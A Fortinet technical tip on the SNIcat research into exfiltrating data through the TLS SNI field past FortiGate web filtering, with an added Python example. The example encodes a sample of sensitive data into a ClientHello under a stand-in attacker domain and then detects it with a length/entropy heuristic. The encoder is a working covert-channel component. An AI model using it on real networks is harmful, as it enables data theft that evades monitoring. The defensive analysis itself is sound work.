pkarna_FTNT
Staff
December 3, 2021

Technical Tip: Bypassing FortiGate web filter profile by using SNI as a covert channel for Data Exfiltration

Description

This article provides Fortinet's response to the mnemonic report "SNIcat: Circumventing the guardians".

 

Related document:

https://www.mnemonic.no/blog/introducing-snicat

Scope

 

Solution

The main concern raised by the blog is that the TLS ClientHello always reaches the destination server, even when the domain being accessed is blacklisted/blocked by a web filter category on the firewall.

The firewall blocks the session only after the TLS handshake has completed, not before.

The researchers exfiltrated data through a FortiGate/FortiOS unit performing SSL deep inspection by placing the exfiltrated data in the SNI field of the ClientHello message.

By doing so, they were able to bypass the web filter profile configured on the device.

To achieve this, the attacker needs control of a host inside the internal network, from which the SNIcat tool is used to exfiltrate the data.
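The following is an added illustration of the covert channel described above and of the check a defender can run on it; it is not code from the mnemonic report, from SNIcat, or from Fortinet. It encodes a payload into DNS-safe labels inside the SNI field of a hand-built ClientHello, then parses that ClientHello back out and scores the hostname the way an inspection engine could. The apex domain (exfil.example), the base32 label encoding and the length/entropy thresholds are assumptions chosen for the demonstration, not SNIcat's actual wire format or any FortiOS heuristic.

```python
import base64
import math
import struct
from typing import Optional

# Constructed example. The apex domain and the base32 label encoding are
# assumptions for the demonstration, not SNIcat's actual wire format.
COVERT_DOMAIN = "exfil.example"   # hypothetical attacker-controlled domain


def encode_sni(payload: bytes, domain: str = COVERT_DOMAIN) -> str:
    """Pack bytes into DNS-safe labels (base32, <=63 octets each) under domain."""
    text = base64.b32encode(payload).decode().rstrip("=").lower()
    labels = [text[i:i + 63] for i in range(0, len(text), 63)]
    return ".".join(labels + [domain])


def decode_sni(hostname: str, domain: str = COVERT_DOMAIN) -> bytes:
    """Reverse encode_sni: strip the domain, rejoin labels, restore padding."""
    suffix = "." + domain
    if not hostname.endswith(suffix):
        raise ValueError("hostname is not under the covert domain")
    text = hostname[: -len(suffix)].replace(".", "").upper()
    text += "=" * (-len(text) % 8)
    return base64.b32decode(text)


def build_client_hello(hostname: str) -> bytes:
    """Build a minimal TLS record carrying a ClientHello with one SNI entry."""
    host = hostname.encode("ascii")
    sni_entry = struct.pack("!BH", 0, len(host)) + host        # name_type 0 = host_name
    sni_list = struct.pack("!H", len(sni_entry)) + sni_entry
    sni_ext = struct.pack("!HH", 0, len(sni_list)) + sni_list  # extension type 0 = server_name
    extensions = struct.pack("!H", len(sni_ext)) + sni_ext
    body = (
        b"\x03\x03" + bytes(32)      # client_version, client_random (zeroed for the demo)
        + b"\x00"                    # session_id length 0
        + b"\x00\x02\x13\x01"        # one cipher suite: TLS_AES_128_GCM_SHA256
        + b"\x01\x00"                # one compression method: null
        + extensions
    )
    handshake = b"\x01" + struct.pack("!I", len(body))[1:] + body   # type 1 = ClientHello
    return b"\x16\x03\x01" + struct.pack("!H", len(handshake)) + handshake


def extract_sni(record: bytes) -> Optional[str]:
    """Walk record -> handshake -> ClientHello -> extensions and return the SNI."""
    if len(record) < 44 or record[0] != 0x16 or record[5] != 0x01:
        return None
    p = 9 + 2 + 32                                      # headers, version, random
    p += 1 + record[p]                                  # session_id
    p += 2 + struct.unpack("!H", record[p:p + 2])[0]    # cipher_suites
    p += 1 + record[p]                                  # compression_methods
    ext_len = struct.unpack("!H", record[p:p + 2])[0]
    p += 2
    end = p + ext_len
    while p + 4 <= end:
        etype, elen = struct.unpack("!HH", record[p:p + 4])
        p += 4
        if etype == 0:                                  # server_name extension
            name_len = struct.unpack("!H", record[p + 3:p + 5])[0]
            return record[p + 5:p + 5 + name_len].decode("ascii", "replace")
        p += elen
    return None


def sni_features(hostname: str) -> dict:
    """Length and Shannon entropy of everything left of the last two labels.
    Treating the last two labels as the registrable domain is a simplification
    (no public-suffix list) made for this example."""
    labels = hostname.split(".")
    sub = "".join(labels[:-2])
    entropy = 0.0
    for ch in set(sub):
        pr = sub.count(ch) / len(sub)
        entropy -= pr * math.log2(pr)
    return {"subdomain_len": len(sub), "entropy": round(entropy, 2)}


def is_suspicious_sni(hostname: str, max_len: int = 50, min_entropy: float = 3.0) -> bool:
    """Heuristic: long, high-entropy subdomain text looks like encoded data."""
    f = sni_features(hostname)
    return f["subdomain_len"] > max_len and f["entropy"] > min_entropy


if __name__ == "__main__":
    sample = b"card numbers and names from the finance share"   # constructed payload
    hello = build_client_hello(encode_sni(sample))
    seen = extract_sni(hello)
    print(seen, is_suspicious_sni(seen), decode_sni(seen))
    print("www.example.com", is_suspicious_sni("www.example.com"))
```

The point of the parser is that the SNI is readable in cleartext before any certificate or key exchange is seen, so a device that waits for the handshake to finish before acting has already let the payload leave. The length/entropy score is only a coarse filter: long hashed labels on legitimate CDN hostnames will trip it, so in practice it is combined with destination reputation and per-host SNI volume rather than used alone.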

 

To prevent the tool from getting into the network and to detect the traffic patterns of the commands it sends, Fortinet released the following signatures, respectively:

1) Python/SNICat.A!exploit

2) SNIcat.Data.Exfiltration.Tool